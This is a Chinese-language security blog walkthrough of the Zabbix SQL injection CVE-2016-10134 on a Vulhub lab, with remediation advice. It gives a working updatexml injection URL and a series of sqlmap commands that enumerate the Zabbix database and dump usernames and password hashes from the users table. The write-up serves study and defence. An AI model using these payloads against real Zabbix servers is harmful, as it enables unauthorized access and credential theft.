CVE-2016-10134 Zabbix SQL注入漏洞

admin 2025年5月13日15:22:30评论7 views字数 1978阅读6分35秒阅读模式
CVE-2016-10134 Zabbix SQL注入漏洞

漏洞简述

Zabbix部分版本源代码的latest.phptoggle_ids[]jsrpc.php中的profieldx2参数存在sql注入,攻击者可通过sql注入获取管理员账户密码,进行增、删、改、查等高危操作。

CVE-2016-10134 Zabbix SQL注入漏洞

受影响版本

Zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3

CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

CVE-2016-10134 Zabbix SQL注入漏洞

知识扩展

Zabbix 是一种网络监视和管理系统,采用Server-Client架构,提供了实时监控、报警机制、性能统计和数据可视化等广泛功能,通过监视各种网络参数保证服务器系统的安全运营,提供灵活的通知机制以让系统管理员快速定位和解决存在的各种问题。

CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

CVE-2016-10134 Zabbix SQL注入漏洞

漏洞环境搭建

漏洞环境搭建

1.克隆 VulHub 仓库到本地

git clone https://bgithub.xyz/vulhub/vulhub.git
CVE-2016-10134 Zabbix SQL注入漏洞

2. 进入到vulhub的目录

cd vulhub
CVE-2016-10134 Zabbix SQL注入漏洞

3.启动漏洞环境

cd zabbix cd CVE-2016-10134docker-compose up -d
CVE-2016-10134 Zabbix SQL注入漏洞

4.访问靶机8080端口,环境搭建完毕。

CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞

漏洞验证

1.打开Zabbix登录页,不进行登录,输入以下payload:

http://192.168.23.128:8080//jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
CVE-2016-10134 Zabbix SQL注入漏洞

出现报错信息,说明本漏洞存在可进行进一步攻击,并显示出了默认用户的用户名

2.使用sqlmap,确认存在注入 

python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*"

CVE-2016-10134 Zabbix SQL注入漏洞

CVE-2016-10134 Zabbix SQL注入漏洞

3.输入以下payload成功获取当前数据库。

python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E --dbs

CVE-2016-10134 Zabbix SQL注入漏洞

4.爆zabbix数据库下的表。

python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix --tables

CVE-2016-10134 Zabbix SQL注入漏洞

5.爆users表下的列名。

python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix -T users --columns

CVE-2016-10134 Zabbix SQL注入漏洞

6.爆userid,name,passwd字段的值。

python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix -T users -C userid,name,passwd --dump

CVE-2016-10134 Zabbix SQL注入漏洞

7.md5解密一下。

CVE-2016-10134 Zabbix SQL注入漏洞

CVE-2016-10134 Zabbix SQL注入漏洞

修复建议

1.升级Zabbix至最新版本;

2.禁用 Guest 账户;

修复步骤:

用管理员身份登入zabbix系统,账号密码为:admin/zabbix

在Administration的User groups页面中禁用 Guests 账户。

CVE-2016-10134 Zabbix SQL注入漏洞
再利用sqlmap攻击,可以看出来防御有效。
CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞
CVE-2016-10134 Zabbix SQL注入漏洞
- 扫码立即关注 -

原文始发于微信公众号(海狼风暴团队):CVE-2016-10134 Zabbix SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月13日15:22:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2016-10134 Zabbix SQL注入漏洞https://cn-sec.com/archives/4058938.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息